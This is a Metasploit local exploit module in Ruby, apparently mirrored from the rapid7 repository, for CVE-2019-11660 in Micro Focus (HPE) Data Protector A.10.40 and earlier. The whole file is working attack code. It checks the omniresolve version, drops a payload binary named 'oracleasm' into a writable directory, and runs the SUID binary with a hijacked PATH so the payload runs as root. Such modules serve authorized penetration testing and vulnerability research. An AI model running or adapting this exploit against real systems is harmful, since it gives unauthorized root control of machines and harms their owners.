CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Linux::Priv

11
  include Msf::Post::Linux::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',

21
        'Description' => %q{

22
          This module exploits the trusted `$PATH` environment

23
          variable of the SUID binary `omniresolve` in

24
          Micro Focus (HPE) Data Protector A.10.40 and prior.

25


26
          The `omniresolve` executable calls the `oracleasm` binary using

27
          a relative path and the trusted environment `$PATH`, which allows

28
          an attacker to execute a custom binary with `root` privileges.

29


30
          This module has been successfully tested on:

31
          HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;

32
          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)

33


34
          The vulnerability has been patched in:

35
          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019

36
        },

37
        'License' => MSF_LICENSE,

38
        'Author' => [

39
          's7u55', # Discovery and Metasploit module

40
        ],

41
        'DisclosureDate' => '2019-09-13',

42
        'Platform' => [ 'linux' ],

43
        'Arch' => [ ARCH_X86, ARCH_X64 ],

44
        'SessionTypes' => [ 'shell', 'meterpreter' ],

45
        'Targets' => [

46
          [

47
            'Micro Focus (HPE) Data Protector <= 10.40 build 118',

48
            { upper_version: Rex::Version.new('10.40') }

49
          ]

50
        ],

51
        'DefaultOptions' => {

52
          'PrependSetgid' => true,

53
          'PrependSetuid' => true

54
        },

55
        'References' => [

56
          [ 'CVE', '2019-11660' ],

57
          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]

58
        ],

59
        'Notes' => {

60
          'Reliability' => [ REPEATABLE_SESSION ],

61
          'Stability' => [ CRASH_SAFE ],

62
          'SideEffects' => [ARTIFACTS_ON_DISK]

63
        },

64
        'DefaultTarget' => 0

65
      )

66
    )

67


68
    register_options(

69
      [

70
        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])

71
      ]

72
    )

73


74
    register_advanced_options(

75
      [

76
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

77
      ]

78
    )

79
  end

80


81
  def base_dir

82
    datastore['WritableDir'].to_s

83
  end

84


85
  def suid_bin_path

86
    datastore['SUID_PATH'].to_s

87
  end

88


89
  def check

90
    return CheckCode::Safe("#{suid_bin_path} file not found") unless file? suid_bin_path

91
    return CheckCode::Safe("#{suid_bin_path} is not setuid") unless setuid? suid_bin_path

92


93
    info = cmd_exec("#{suid_bin_path} -ver").to_s

94
    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/

95
      version = '%.2f' % ::Regexp.last_match(1).to_f

96
      build = ::Regexp.last_match(3).to_i

97
      vprint_status("omniresolve version #{version} build #{build}")

98


99
      unless Rex::Version.new(version) < target[:upper_version] ||

100
             (Rex::Version.new(version) == target[:upper_version] && build <= 118)

101
        return CheckCode::Safe

102
      end

103


104
      return CheckCode::Appears

105
    end

106


107
    vprint_error('Could not parse omniresolve -ver output')

108
    CheckCode::Detected

109
  end

110


111
  def exploit

112
    if !datastore['ForceExploit'] && is_root?

113
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

114
    end

115


116
    unless writable?(base_dir)

117
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")

118
    end

119


120
    payload_path = File.join(base_dir, 'oracleasm')

121
    register_file_for_cleanup(payload_path)

122
    write_file(payload_path, generate_payload_exe)

123
    chmod(payload_path)

124


125
    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))

126
    register_file_for_cleanup(trigger_path)

127
    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")

128
    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")

129
  end

130
end

131


132